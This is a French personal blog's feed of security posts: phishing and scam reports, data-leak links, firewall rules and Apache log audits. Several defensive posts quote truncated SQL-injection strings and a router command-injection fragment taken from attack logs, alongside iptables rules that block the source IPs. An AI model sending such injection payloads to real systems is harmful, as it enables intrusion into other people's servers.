Securite-Internets on Blog GoHugo de Fredô : Linux, Proxmox, IA, Trail, Course, Randonnée, Gravel, Ski de Randonnée

GreyNoise IP Check

Wed, 25 Feb 2026 00:00:00 +0000

Le lien : https://check.labs.greynoise.io/

France Culture : Désinformation sur Mastodon

Thu, 29 Jan 2026 00:00:00 +0000

Dans l’emission “Le réseau européen “W social” pensé comme un “anti X” a t-il une chance d’exister ?” Ecouter

“concernant le réseau décentralisé Mastodon, développé par un informaticien allemand, Eugen Rochko, ce dernier a déclaré quitter son propre réseau, fatigué entre autres par le comportement de certains utilisateurs.”

C’est faux :

Dix ans après le lancement du projet, Eugen Rochko cède les rênes à un trio déjà très impliqué dans le développement de Mastodon et du fédivers. La petite équipe qui pilote le projet confirme avoir engagé les travaux nécessaires à la création d’une association à but non lucratif de droit belge. Celle-ci doit faire perdurer la volonté historique de son fondateur : créer une alternative aux réseaux sociaux détenus par des milliardaires. « Le fédivers est une île au sein d’un paysage capitaliste dystopique de plus en plus infernal. Et selon moi, Mastodon est notre meilleure chance de partager cette vision d’un avenir meilleur avec le grand public. C’est pourquoi je reste impliqué, même si c’est sous la forme d’un rôle plus consultatif et moins public », explique-t-il dans un billet de blog .

Mon avis sur cozytouch

Mon, 24 Nov 2025 00:00:00 +0000

Impossible d’avoir du support pour Cozytouch, l’application de Atlantic et Sauter est une vrai arnaque. J’ai donc mis un avis très négatif sur l’App Store.

Wait & See.

Mon avis sur assurantprotection.fr

Sat, 15 Nov 2025 00:00:00 +0000

Depuis le 04/09/2025 le portable est en réparation, je m’interroge sur le fait de prendre une telle assuance. Est-ce vraiment profitable ? Plus de 2 mois de réparation et toujours pas de portable, on va forcement acheter un autre portable et on va vendre l’ancien … mais à combien ? Quand je regarde leboncoin.fr c’est 400 Euros pour un neuf. Est-ce que dans ses conditions cela vaut la peine de prendre la garantie ? Si la garantie n’avait pas marché, j’aurais carrément eu une perte nette (Coût de la garantie).

Security.txt !

Sat, 15 Nov 2025 00:00:00 +0000

Je viens de decouvrir le standard security.txt via ( https://securitytxt.org/ ) .

J’ai donc fait dans un premier temps un Git Hall-of-fame ( https://git.cyber-neurones.org/farias/Hall-of-fame )

Quand je fais un audit du fichier :

# grep "/security.txt" /var/log/apache2/access.*.log \ 
/var/log/apache2/access.*.log.1 | sed 's/:/ /g' \
| awk '{print $2 " " $11 " " $18}'
167.94.138.203 /.well-known/security.txt CensysInspect/1.1;
162.142.125.219 /security.txt CensysInspect/1.1;
167.94.146.53 /security.txt CensysInspect/1.1;

Personne sauf CensysInspect demande le fichier … pas d’urgence.

Don à Let's Encrypt : Fait !

Wed, 22 Oct 2025 00:00:00 +0000

L’url pour le don : https://letsencrypt.org/donate/ .

Pour que le service puisse continuer il faut donner !

J’utilise Let’s Encrypt pour tout mes certificats.

Merci LDLC d'avoir mis mes données dans le dark web.

Fri, 06 Sep 2024 00:00:00 +0000

Misère.

Je ne suis pas une data !

Tue, 30 Apr 2024 00:00:00 +0000

UFC Que Choisir propose une page unique pour demander le retrait de ses données personnelles face aux démarcheurs et revendeurs de prospects : https://www.respectemesdatas.fr/

Fuite de données : haveibeenpwned.com !

Fri, 19 Jan 2024 00:00:00 +0000

J’aime bien l’outil : https://haveibeenpwned.com/ , qui permet de voir si notre email est lié à une fuite.

J’ai fait le test sur mon email : 6 fois trouvés …

- Data Enrichment Exposure From PDL Customer: In October 2019, security researchers Vinny Troia and Bob Diachenko identified an unprotected Elasticsearch server holding 1.2 billion records of personal data. The exposed data included an index indicating it was sourced from data enrichment company People Data Labs (PDL) and contained 622 million unique email addresses. The server was not owned by PDL and it’s believed a customer failed to properly secure the database. Exposed information included email addresses, phone numbers, social media profiles and job history data.

Pour la sécurité informatique l'idéal est de bloqué les IP Russes

Wed, 15 Feb 2023 00:00:00 +0000

Pour information la liste des Ranges Russes : https://lite.ip2location.com/russian-federation-ip-address-ranges

Autre information : https://www.numerama.com/cyberguerre/1269242-la-police-britannique-affiche-7-cybercriminels-russes-en-gelant-leurs-comptes-bancaires.html

Les anciens membres du groupe de cybercriminels Trickbot et Conti ont été identifiés par les forces de l’ordre britanniques. Ils sont à l’origine de l’un des malwares les plus dangereux de ces dernières années.

…

Tous ressortissants russes, ils ont participé à la préparation des attaques, au développement et à la gestion des logiciels malveillants, au vol d’infos ainsi qu’au blanchiment d’argent.

Quel plaisir la fermeture de RT France !

Fri, 03 Feb 2023 00:00:00 +0000

Je viens de bloquer une nouvelle IP : 178.158.18.89 ( Russes ) . La Russie est toujours en première ligne pour la désinformation.

Liste des IP qui essayent d’exploiter la faille "f+bin.arm7%3b%23&remoteSubmit=Save"

Thu, 29 Jul 2021 00:00:00 +0000

Exemple d’un logs :

42.193.186.22 - - [29/Jul/2021:10:49:58 +0200] "f+bin.arm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
42.193.186.22 - - [29/Jul/2021:10:49:58 +0200] "POST /cgi-bin/ViewLog.asp HTTP/1.1" 302 0 "-" "MtmKilledYou"

J’ai donc fait :

# zgrep "arm7" /var/log/apache2/access.humhub.log.*gz | sed 's/:/ /g' | awk '{print $2}' | sort -n | uniq | awk '{print "iptables -A INPUT -s " $1 " -j DROP "}'
iptables -A INPUT -s 42.193.186.22 -j DROP 
iptables -A INPUT -s 189.72.251.188 -j DROP 
iptables -A INPUT -s 195.47.196.114 -j DROP

J’ai donc blacklisté trois IP de plus … quand on aime …

Linux backdoor : systemd-daemon & gvfsd-helper

Thu, 29 Apr 2021 00:00:00 +0000

Je viens de lire l’article : https://www.bleepingcomputer.com/news/security/new-stealthy-linux-malware-used-to-backdoor-systems-for-years/

Command-and-control servers historically used by the malware have domains registered six years ago, in December 2015, all of them

FileName	MD5	Detection	First Seen in VT
systemd-daemon	1d45cd2c1283f927940c099b8fab593b	0/61	2018-05-16 04:22:59
systemd-daemon	11ad1e9b74b144d564825d65d7fb37d6	0/58	2018-12-25 08:02:05
systemd-daemon	5c0f375e92f551e8f2321b141c15c48f	0/56	2020-05-08 05:50:06
gvfsd-helper	64f6cfe44ba08b0babdd3904233c4857	0/61	2021-01-18 13:13:19

J’ai donc rapidement fait :

# sudo find / -name 'systemd-daemon'
# sudo find / -name 'gvfsd-helper'

Aucun n’est présent …

Virus via Skype : Lien Google -> Lien vers xn--p1ai -> Virus

Wed, 03 Feb 2021 00:00:00 +0000

Via Skype je recois une url ver google, cette url renvoi vers un site xn–2–9lcqk.xn–p1ai (185.212.128.141 : Pays-Bas) et de ce site vers http://income-method.net/ (Russie) et pour finir un virus remonte ….

Misère, merci la Russie pour cette merde ….

Propriété de income-method.net

Disponibilité	Attribué
Date d’enregistrement	04/01/2021
Date d’expiration	04/01/2022
Adresse IP	5.8.47.2
Source	VeriSign

Propriété de l’adresse IP 185.212.128.141

Localisation	Pays-Bas
Réputation	71 %
Anonymat	Aucun détection
Usage	Attribué
Source	RIPE NCC
Nom d’hote	sk.cc

Mon iptable

Thu, 21 Jan 2021 00:00:00 +0000

Voici mon iptable courante :

*filter
:INPUT ACCEPT [1617998378:2870557962726]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [342938945:308572427452]
-A INPUT -s 112.126.90.41/32 -j DROP 
-A INPUT -s 116.147.2.110/32 -j DROP 
-A INPUT -s 122.14.209.13/32 -j DROP 
-A INPUT -s 158.69.13.199/32 -j DROP 
-A INPUT -s 193.112.88.67/32 -j DROP 
-A INPUT -s 210.21.218.26/32 -j DROP
-A INPUT -s 223.75.249.2/32 -j DROP 
-A INPUT -s 27.50.160.35/32 -j DROP 
-A INPUT -s 49.233.63.234/32 -j DROP 
-A INPUT -s 91.242.37.16/32 -j DROP 
-A INPUT -s 103.87.167.253/32 -j DROP 
-A INPUT -s 113.160.229.252/32 -j DROP 
-A INPUT -s 123.201.235.83/32 -j DROP 
-A INPUT -s 156.221.147.68/32 -j DROP 
-A INPUT -s 171.236.213.49/32 -j DROP 
-A INPUT -s 176.240.226.165/32 -j DROP 
-A INPUT -s 202.90.133.210/32 -j DROP 
-A INPUT -s 216.104.201.88/32 -j DROP 
-A INPUT -s 175.172.174.191/32 -j DROP 
-A INPUT -s 123.132.65.176/32 -j DROP
-A INPUT -s 103.145.13.43/32 -j DROP 
-A INPUT -s 175.21.153.128/32 -j DROP 
-A INPUT -s 178.63.34.189/32 -j DROP 
-A INPUT -s 74.120.14.36/32 -j DROP 
-A INPUT -s 34.240.212.8/32 -j DROP 
-A INPUT -s 167.248.133.52/32 -j DROP 
-A INPUT -s 162.142.125.52/32 -j DROP 
-A INPUT -s 197.53.220.102/32 -j DROP 
-A INPUT -s 134.209.87.169/32 -j DROP 
-A INPUT -s 66.151.211.226/32 -j DROP 
-A INPUT -s 61.40.0.0/16 -j DROP
-A INPUT -s 66.210.251.136/32 -j DROP 
-A INPUT -s 202.215.160.75/32 -j DROP 
-A INPUT -s 81.68.159.121/32 -j DROP 
-A INPUT -s 178.129.246.3/32 -j DROP 
-A INPUT -s 46.209.56.107/32 -j DROP 
-A INPUT -s 156.197.215.223/32 -j DROP 
-A INPUT -s 156.216.50.199/32 -j DROP 
-A INPUT -s 192.241.224.104/32 -j DROP 
-A INPUT -s 192.241.206.242/32 -j DROP 
-A INPUT -s 216.245.193.22/32 -j DROP 
COMMIT

Cela fait suite aux articles :

France Soir n'est plus un journal, c'est une usine a clic pour les complotistes.

Tue, 17 Nov 2020 00:00:00 +0000

France Soir n’est plus un journal, c’est une usine a clic pour les complotistes. Merci d’arreter de lire les articles ! Et merci d’arreter de les diffuser !

Merci de voir : https://www.newsguardtech.com/wp-content/uploads/2020/07/FranceSoir.fr_FrenchVersion-1.pdf

Le site de France-Soir, un ancien grand journal national qui a étérelancé en ligne en 2015, et qui a publié des allégations non fondéessur la pandémie de COVID-19.

Soyez vigilants : ce site web nerespecte pas plusieurs principesjournalistiques de base.

LiveBox Orange Pro : Tous les certificats sont deads ...suite a une mise à jours ?!

Tue, 10 Nov 2020 00:00:00 +0000

Avec Orange c’est l’enfer, impossible de monter une architecture stable … toujours des problèmes.

Normalement j’ai un NAT vers une IP locale, et ce NAT fait que j’utilise le certificat mis sur l’IP locale.

Quand je fais sur l’IP publique :

openssl s_client -showcerts -connect 80.15.48.50:443
CONNECTED(00000003)
Can't use SSL_get_servername
depth=1 C = FR, O = Orange, CN = Orange Devices Generic27 CA
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 C = FR, O = Orange, CN = CCD42E-Livebox Fibre-JA20086CN001383
verify return:1
---
Certificate chain
 0 s:C = FR, O = Orange, CN = CCD42E-Livebox Fibre-JA20086CN001383
   i:C = FR, O = Orange, CN = Orange Devices Generic27 CA

Au vue du nmap c’est la gateway qui a une mauvaise information :

Ransomware : un été catastrophique ...

Wed, 26 Aug 2020 00:00:00 +0000

Quelques noms :

Groupe SPIE : https://www.zdnet.fr/actualites/le-groupe-spie-vise-par-un-ransomware-en-juillet-39907955.htm : Lundi 10 Août 2020
Groupe Carnaval : https://www.usine-digitale.fr/article/le-croisieriste-carnival-victime-d-un-ransomware.N995069 : 18 août 2020
Groupe GARMIN : https://www.usine-digitale.fr/article/garmin-aurait-debourse-plusieurs-millions-de-dollars-pour-mettre-fin-a-un-ransomware.N991824 : 04 août 2020
Groupe Brown-Forman : https://www.lemondeinformatique.fr/actualites/lire-ransomware-la-maison-mere-de-jack-daniel-s-trinque-80052.html 17 Aout 2020
Groupe Canon : https://www.lesnumeriques.com/photo/canon-victime-d-un-ransomware-les-pirates-mettent-la-main-sur-10-to-de-donnees-n153175.html :
Groupe MMA : https://www.lemagit.fr/actualites/252486873/MMA-le-bras-de-fer-avec-le-ransomware-se-poursuit : 29 juil. 2020
….

Misère.

Amazon : Comment avoir ses propres données ?

Sun, 03 May 2020 00:00:00 +0000

Il suffit d’aller sur le lien : https://amazon.com/gp/privacycentral/dsar/preview.html , ensuite il faut passer la double authentification.

Et selectionner le type de données que l’on désire : (le mieux est de demander “Request All Your Data”)

Puis attendre :

Patience …

Encore une grosse attaque de l'Ukraine : 194.60.254.242

Fri, 10 Apr 2020 00:00:00 +0000

Donc j’ajoute le blocage de cette IP : 194.60.254.242 .

Changement du routeur Wifi : TP-LINK Model TD-W9970 par NETGEAR Model R7000

Thu, 02 Apr 2020 00:00:00 +0000

J’ai donc changé mon routeur Wifi, avant j’avais un TP-LINK Model TD-W9970 : à 39 Euros sur Amazon, maintement un NETGEAR Model R7000 ( NIGHTAWK AC1900 Smart Wifi Router ) : à 152 Euros sur Amazon.

J’ai donc fait des tests :

Vitesse de mire adsl avec le Wifi sur LiveBox V3 de Orange : entre 2,4 Mo/s et 2,6 Mo/s
Vitesse de mire adsl avec le Wifi sur TP-LINK Model TD-W9970 : entre 1,5 Mo/s et 1,6 Mo/s
Vitesse de mire adsl avec le Wifi sur NETGEAR Model R7000 : entre 7,2 Mo/s et 7,8 Mo/s

Voici quelques captures (J’ai fait plusieurs mesure à chaque fois, je n’ai pas mis toute les captures).

Joplin : des appels à api.ipify.org (API de géolocalisation des IP)

Wed, 22 Jan 2020 00:00:00 +0000

J’ai pu voir des appels à l’API : api.ipify.org

Il y a donc l’utilisation d’une API pour la géolocalisation des IP. Je sais pas si c’est très bien …

A suivre.

PHPNET.ORG : Encore du pishing

Tue, 03 Sep 2019 00:00:00 +0000

Cette fois le phishing est sur :

http://divini.biz/ (Géolocalisation du serveur : South Africa) puis sur http://netim.fr11f50294.furgoniauto.it (Géolocalisation du serveur : Italy - Toscana - Arezzo).

Misère.

Free Mobile : transfert contentieux impayeé free mobile n TFRMPP0R-8004 ( Arnaque !)

Mon, 05 Aug 2019 00:00:00 +0000

Attention au email de phishing : “transfert contentieux impayeé free mobile n TFRMPP0R-8004” déjà c’est pas impayeé :) .

Ensuite c’est du phishing …

...
Received: from o16824569x168.outbound-mail.sendgrid.net (o16824569x168.outbound-mail.sendgrid.net [168.245.69.168])
...
Message-Id: <JPGAVSLL-5TPZ-ZSLH-MT6M-WTAF5ZLBSLEX@smartusys.com>
Mime-Version: 1.0
From: free mobile <ERohit1.Supta1@smartusys.com>
....
https://u3629643.ct.sendgrid.net/ 
...

Misère.

Vol de photo sur le Net ?

Sun, 02 Jun 2019 00:00:00 +0000

Il me faudrait trouver un plugin Wordpress qui ajoute automatiquement un logo ou le nom de mon site en filigrane ( Watermark ) …

Exemple n°1 : http://texansonlineofficialshop.com :

Exemple n°2 : http://eka.letsfixerimages.club :

…

https://haveibeenpwned.com : Afin de voir si notre email est dans une fuite de donnée

Sat, 19 Jan 2019 00:00:00 +0000

Je conseille vivement le site : https://haveibeenpwned.com . Il permet de voir si notre email est dans les récentes fuites de données.

LaCie Setup App : connexion sur data collection.api.mylyve.com

Fri, 21 Dec 2018 00:00:00 +0000

Pourquoi une connexion sur datacollection.api.mylyve.com ? ( 52.34.218.207 )

Misère.

Le whois de mylyve.com :

Wordpress : Beaucoup d'attaque par injection aujourd'hui ( wordfence_logHuman=11111111111111′ UNION SELECT ).

Sat, 15 Dec 2018 00:00:00 +0000

J’ai donc bloquer les IP :

91.189.41.165 (Sweden) / 96.125.162.13 (United States) . Cela change des Russes …

Les attaques :

91.189.41.165 (Sweden) Blocked for SQL Injection in query string: wordfence_logHuman=11111111111111’ UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81
96.125.162.13 (United States) Blocked for SQL Injection in query string: wordfence_logHuman=11111111111111’ UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81

Mise à jours du 26/12/2018 :

décembre 26, 2018 7:50 72.1.219.230 (Canada) Blocked for SQL Injection in query string: wordfence_logHuman=11111111111111" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81
décembre 26, 2018 7:44 173.249.53.80 (Germany) Blocked for SQL Injection in query string: wordfence_logHuman=11111111111111" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81
décembre 26, 2018 7:38 173.212.196.158 (Germany) Blocked for SQL Injection in query string: hid=657FB0DBB2C8282D149D6F927F316FF0" or (1,2)=(select*from(select name_const(CHAR(111,108,111,108,111,1

Mise à jours du 03/01/2019 :

Une bonne raison pour ne pas proposer du Javascript et pour bloquer le Javascript

Sat, 24 Nov 2018 00:00:00 +0000

Le lien : https://www.01net.com/actualites/un-code-javascript-suffit-pour-savoir-quels-sites-web-vous-visitez-1572207.html .

Des chercheurs ont montré que l’on pouvait espionner la navigation d’un Internaute en observant l’utilisation de la mémoire cache. A l’heure actuelle, il n’existe aucun moyen pour parer ce type d’attaque.

Mounir Mahjoubi dénonce l'extraterritorialité de la loi américaine Cloud Act

Wed, 24 Oct 2018 00:00:00 +0000

Très bon article : https://www.numerama.com/politique/434095-acces-aux-donnees-mounir-mahjoubi-critique-lextraterritorialite-du-cloud-act-americain.html :

Le secrétaire d’État au numérique Mounir Mahjoubi dénonce l’extraterritorialité de la loi américaine Cloud Act, qui permet aux USA un accès aux données stockées dans le cloud par les sociétés américaines, où qu’elles soient dans le monde.

Le vote, aux États-Unis, d’une nouvelle loi sur l’accès aux données stockées dans le cloud, où qu’elles soient dans le monde, fait des vagues à l’étranger, en particulier en France. Ce mardi 23 octobre, elle a même provoqué une réaction de Mounir Mahjoubi, le secrétaire d’État au numérique, puisque l’intéressé répondait à une question orale posée par le député Philippe Latombe, membre du MoDem.

Les failles Meltdown et Spectre sur le net

Sat, 06 Jan 2018 00:00:00 +0000

Plus gros que le bug de l’an 2000 et beaucoup plus discret … Misère.

Publié	Site	Liens
05/01/2018	futura-sciences.com	https://www.futura-sciences.com/tech/actualites/securite-processeurs-intel-deux-failles-securite-touchent-aussi-puces-amd-arm-69737/ : Processeurs Intel : deux failles de sécurité touchent aussi les puces AMD et ARM .
05.01.2018 à 15h10	sciencesetavenir.fr	https://www.sciencesetavenir.fr/high-tech/informatique/failles-de-securite-meltdown-et-spectre-les-fabricants-de-processeurs-dementent-tout-risque_119616 : Pour Intel, Meltdown ne relève pas d’une faille de conception et sera peu sensible pour les utilisateurs.
06 janv. 10:11	lci.fr	https://www.lci.fr/high-tech/processeurs-intel-failles-informatiques-meltdown-et-spectre-apple-amazon-google-vous-etes-surement-concernes-voici-ce-que-vous-risquez-2075174.html : Failles informatiques Meltdown et Spectre : vous êtes sûrement concernés, voici ce que vous risquez.
05/01 à 11:24	lesechos.fr	https://www.lesechos.fr/tech-medias/hightech/0301101606811-deux-importantes-failles-de-securite-decouvertes-dans-tous-les-processeurs-intel-2142383.php : Intel à l’épreuve de failles de sécurité sur ses processeurs
05/01/2018 à 14h15	bfmtv.com	http://bfmbusiness.bfmtv.com/hightech/failles-intel-course-contre-la-montre-pour-corriger-spectre-et-meltdown-1342585.html : Failles Intel: course contre la montre pour corriger Spectre et Meltdown
04.01.2018 à 12h55	sciencesetavenir.fr	https://www.sciencesetavenir.fr/high-tech/informatique/la-faille-de-securite-meltdown-contraint-intel-a-brider-la-vitesse-de-ses-processeurs_119588 : Une faille de sécurité contraint Intel à brider la vitesse de ses processeurs
4 janvier 2018 à 11h57	journaldugeek.com	http://www.journaldugeek.com/2018/01/04/meltdown-et-spectre-le-point-sur-les-failles-majeures-touchant-aussi-bien-les-cpu-intel-que-les-autres-marques-et-architectures/ : Meltdown et Spectre : le point sur les failles majeures touchant aussi bien les CPU Intel que les autres marques et architectures
04/01/2018 à 11:35	lefigaro.fr	http://www.lefigaro.fr/secteur/high-tech/2018/01/04/32001-20180104ARTFIG00082-qui-sont-spectre-et-meltdown-les-failles-de-securite-qui-font-trembler-le-monde-de-l-informatique.php : Que sont Spectre et Meltdown, les failles de sécurité qui font trembler le monde de l’informatique ?
03/01/2018 à 16:31	lefigaro.fr	http://www.lefigaro.fr/secteur/high-tech/2018/01/03/32001-20180103ARTFIG00166-une-faille-de-securite-majeure-dans-des-processeurs-intel-menace-la-performance-des-ordinateurs.php : Une faille de sécurité dans des processeurs Intel menace la performance des ordinateurs
04/01/2018 à 18h41	01net.com	http://www.01net.com/actualites/intel-amd-arm-7-questions-pour-comprendre-les-mega-failles-des-processeurs-1341798.html : Intel, AMD, ARM: 7 questions pour comprendre les méga-failles des processeurs
3 janvier 2018 \| 12:15	macg.co	https://www.macg.co/materiel/2018/01/une-faille-de-securite-de-dix-ans-dans-les-processeurs-intel-100940 : Une faille de sécurité de dix ans dans les processeurs Intel
3 janvier 2018 à 14h37	hitek.fr	http://hitek.fr/actualite/faille-securite-processeurs-intel-baisse-performances-ordinateurs_15014 : UNE IMPORTANTE FAILLE DE SÉCURITÉ SUR LES PROCESSEURS INTEL RISQUE DE RALENTIR LES PERFORMANCES DE VOTRE ORDINATEUR
03 janvier 2018	numerama.com	https://www.numerama.com/tech/318251-faille-critique-sur-les-processeurs-intel-quelles-seront-les-consequences.html : Faille sur les processeurs Intel : quelles protections, quelles conséquences possibles
03 janvier 2018	blogdumoderateur.com	https://www.blogdumoderateur.com/faille-processeurs-intel/ : Processeurs Intel : la correction d’une faille majeure pourrait ralentir votre ordinateur
03 janvier 2018	techniques-ingenieur.fr	https://www.techniques-ingenieur.fr/actualite/articles/faille-intel-le-pire-est-a-venir-50725/ : Faille Intel : le pire est à venir
04 janvier 2018	lemonde.fr	http://www.lemonde.fr/pixels/article/2018/01/05/meltdown-et-spectre-les-deux-failles-critiques-decouvertes-dans-la-plupart-des-processeurs_5237712_4408996.html :
Déc 29, 2017	macfay-hardware.fr	http://www.macfay-hardware.fr/failles-processeurs-intel-explique/ : Des failles dans nos processeurs Intel ? On vous explique tout !

En attendant la publication du de XSA-253 ( patch KPTI / KASLR ) : #meltdownattack

Wed, 03 Jan 2018 00:00:00 +0000

Pour plus d’information sur la faille qui va faire perdre des performances:

XSA-253 :
- https://xenbits.xen.org/xsa/ : Jeudi 04/01/2018 à midi.
KPTI :
- https://en.wikipedia.org/wiki/KPIT_Technologies .
- https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/ .
Performance :
- https://www.phoronix.com/scan.php?page=article&item=linux-415-x86pti&num=2 : - 10% de performance .
Le patch :
- https://github.com/torvalds/linux/commit/a89f040fa34ec9cd682aed98b8f04e3c47d998bd#diff-678874d00bf0df04f6f427f16f1dea36R902 .

Many x86 CPUs leak information to user space due to missing isolation of user space and kernel space page tables. There are many well documented ways to exploit that.
The upcoming software migitation of isolating the user and kernel space page tables needs a misfeature flag so code can be made runtime conditional.
Add the BUG bits which indicates that the CPU is affected and add a feature bit which indicates that the software migitation is enabled.
Assume for now that _ALL_ x86 CPUs are affected by this. Exceptions can be made later.

On va donc attendre jeudi à midi.

(Docteur-gsm.com & Paradisdiscount.com ) Enfin j'ai eu mon remboursement !

Thu, 03 Aug 2017 00:00:00 +0000

L’histoire est longue, l’histoire commence avant mon article sur la réparation de l’Alcatel IDOL : https://www.cyber-neurones.org/2016/03/changement-ecran-tactile-alcatel-onetouch-idol-3/ du 17/03/2016 (24033 visites le 3/08/2017). Avant d’écrire l’article j’ai une personne (sur un forum) qui m’indique qu’il est possible de changer seulement la vitre (contrairement à ce que je dis, pour moi seul le bloc complet peut être mis facilement). Pour cela il me dit qu’il faut commander chez docteur-gsm.com ou paradisdiscount.com. Au début je ne suis pas chaud quand je vois que c’est à Hong Kong, mais finalement je me dis que cela peut faire un bon sujet : “Pièce bidon”. Ensuite je décide de commander une première fois chez paradisdiscount.com , et de commander la même pièce chez docteur-gsm.com mais d’annuler rapidement la transaction. Le but de la seconde commande est plus de testé hipay.com . Voir si l’on peut annuler le paiement …

Hipay.com, quelles sont les vérifications faites sur les sites Marchands ?

Thu, 27 Jul 2017 00:00:00 +0000

J’ai donc deux questions :

Quelles sont les vérifications faites sur les sites Marchands ?
Quelles sont les pressions faites sur les sites Marchands ? ( Visiblement il n’y a aucune pression au vue de votre réponse du 16/07/2017 : “Hipay.com : les menaces et intimidations …”) .

Le 12/04/2016, je vous ai envoyé un email pour voir indiquer tous ce que je trouvais pas très clairs sur les sites docteur-gsm.com et paradisdsicount.com : Hipay.com : vérification des sites . J’ai aussi fait un email à l’administrateur le 18/07/2017 pour lui expliquer qu’il utilisait des cookies : Paradisdiscount.com et docteur-gsm.com : les cookies pour les nuls .

Paradisdiscount.com et docteur-gsm.com : les cookies pour les nuls

Tue, 18 Jul 2017 00:00:00 +0000

J’ai pu lire sur http://vie-efficace.blogspot.fr/2017/01/paradisdiscountcom-arnaque.html (du 10 janvier 2017) : “Les sites Docteur-GSM.Com et Paradisdiscount.Com n’utilisent aucun tracker ou cookie qui doit être soumis à un accord du client contrairement aux dire de Fréderic Arias.” Un fois de plus il étale son ignorance sur la toile.

Sur le site Paradisdiscount.Com : test fait 18 juillet 2017

Sur le site Docteur-GSM.Com : test fait 18 juillet 2017

A vous de juger s’il y a des cookies comme je le dis … il copie/colle une boutique PrestaShop ( https://www.prestashop.com/fr ) sans comprendre comment cela fonctionne et il se permet de donner des leçons au professionnel. Quel imbécile !

Hipay.com : les menaces et intimidations ...

Sun, 16 Jul 2017 00:00:00 +0000

Un joli message de hipay.com pour confirmer qu’ils ne sont pas tiers de confiance mais seulement tiers de paiement. En gros si vous vous faites arnaquer il faut pas venir ce plaindre chez eux, et le Marchand pourra continuer …. Mes questions sans réponses :

Qui peut faire pression sur le Marchand s’il ne répond pas ?
Qui peut faire pression sur le Marchand s’il y a des fausses informations sur le site ?
Qui peut faire pression sur le Marchand si le numéro vert est faux ?
Est-ce que l’on peut accorder un moyen de paiement à un Marchant sans avoir fait des vérifications ?
Si on fait des vérifications, pourquoi ne pas les rendre publique ?
Est-ce qu’un site ne respectant pas les avertissements sur les cookies peut avoir le paiement hipay ?
Est-ce qu’un site ne respectant pas la loi Hamon peut avoir le paiement hipay ?
Pourquoi le service juridique fait un email à l’hébergeur sans me faire avant un email directement ?
Quel est le client le plus important pour hipay, le Marchand ou le client du Marchand ?
Combien de client de Marchand vont porter plainte pour un paiement inférieur à 50 Euro ?
Combien de client de Marchand vont faire un signalement sur https://www.internet-signalement.gouv.fr pour un paiement inférieur à 50 Euro ? Quelles sont les réelles actions de https://www.internet-signalement.gouv.fr suite à un signalement ?
Combien de client de Marchand vont faire un signalement sur https://www.econsumer.gov ?
Comment cela c’est passé avec le site “RDcommerce :RDCOMMERCE.COM " qui utilisait le paiement hipay, et qui se faisait passait pour Rue du Commerce ? Qui a décider de fermer ce site, c’est hipay ou la justice ? Comment votre système de vérification a pu laisser passer un tel site ?
Est-ce que j’ai le droit de dire que j’ai jamais eu de réponse en 48h de votre part (quand j’ai eu une réponse) ? Et est-ce que je peux publier les template des réponses ? Avez-vous mis des donnés dans l’OpenData sur le temps de traitement des emails afin de voir que je suis en cas particulier ?
…

A vous de juger la pression de hipay sur les Marchand :

Wordfence, mon analyse à partir des logs d'Apache des attaques par injection SQL

Sat, 17 Dec 2016 00:00:00 +0000

J’ai donc les logs d’apache du 14/03/2008 à aujourd’hui et j’ai installé Wordfence le 7/12/2016. Je veux voir si les attaques par injection SQL en mode GET sont nouvelles ou pas. Et je veux voir si cela correspond à la date d’installation de Wordfence.

Quelques commandes de base pour rappel :

Décompression de tous les fichiers :
- gunzip access.log.*.gz
On compte le nombre de fichier :
- ls -l LogsWeb/access.log.* | wc -l 3149
On regarde l’espace disque :
- du -sh LogsWeb 6,9G LogsWeb
On compte le nombre de ligne :
- wc -l LogsWeb/access.log.* | awk ‘{total += $1} END {print “Total " total}’ Total 53549284
On recherche le mot “Union” sens faire attention à la casse.Attention on ne regarde que les requêtes de type GET et non celle de type POST.
- time grep -w “UNION” LogsWeb/* > union.txt real 3m21.170s user 0m44.107s sys 0m5.489s
- wc -l union.txt 159 union.txt
- time grep -i “UNION” LogsWeb/* > union.txt real 6m46.629s user 3m27.873s sys 0m5.425s
- wc -l union.txt 66644 union.txt
- grep -i “select” union.txt > select.txt
- wc -l select.txt 16008 select.txt

J’ai donc fait une révision de “du”, “awk”, “ls”, “gunzip”, “grep” (avec ‘-w’ et sans casse ‘-i’) , “time” ;) . J’ai donc eu 16008 tentatives d’injections par injection avec la méthode GET. Maintenant on va chercher les IPs afin de pouvoir les filtrer.

Digiposte+ : Beaucoup de progrès mais pas sur la sécurité !

Sat, 19 Nov 2016 00:00:00 +0000

Beaucoup de progrès ont été fait sur Digiposte+ (#digiposte #digiposte+), maintenant il y a énormément de commerçants et bientôt il y aura la certification de diplôme. Mais le point noir c’est toujours la sécurité. La sécurité doit être supérieur à celle de Google ou même de Facebook ! Comment peut-on envisager de voir une copie de sa carte d’identité ou de son bulletin de paye dans les mains d’autres personnes.

Securité : Mozilla lance un outil gratuit d'analyse

Thu, 01 Sep 2016 00:00:00 +0000

Le lien est le suivant : https://observatory.mozilla.org/ , j’ai fait un test sur le blog :

Résultat : 0/100 pour une version de WordPress qui est à jour. J’ai envi de dire que leur test est foireux ou alors orienté pour forcer l’utilisation de certaines technologies ;) Le lobbying sécuritaire … c’est nouveau.

Pour Wordpress il y a ce site : https://hackertarget.com/wordpress-security-scan/ . Et ce site resume assez bien ce qu’il faut faire : https://wpformation.com/11-rappels-securite-wordpress/ .

Cheval de Troie : drrtcouncilldds.com & godaddy.com

Wed, 01 Jun 2016 00:00:00 +0000

J’ai encore reçu un email bidon de (vzf43@hk-immigrationservices.co.nz ) avec une pièce jointe (x6339.zip dans les fichiers zip c’est plus pratique de dissimuler les virus), mais cette fois j’ai essayé de comprendre ce que contenait la pièce jointe :

Bonjour,

Ci-joint la copie de notre facture 9206F22129 du 31.05.2016 de 1496 € avec ses justificatifs.

Dans l’attente de son règlement,

Je vous remercie.

Cordiales salutations.

Marleen Jacobs

Comptable chargé de recouvrement “confrères”

Docteur-gsm.com, j'ai enfin le vrai email pour le support.

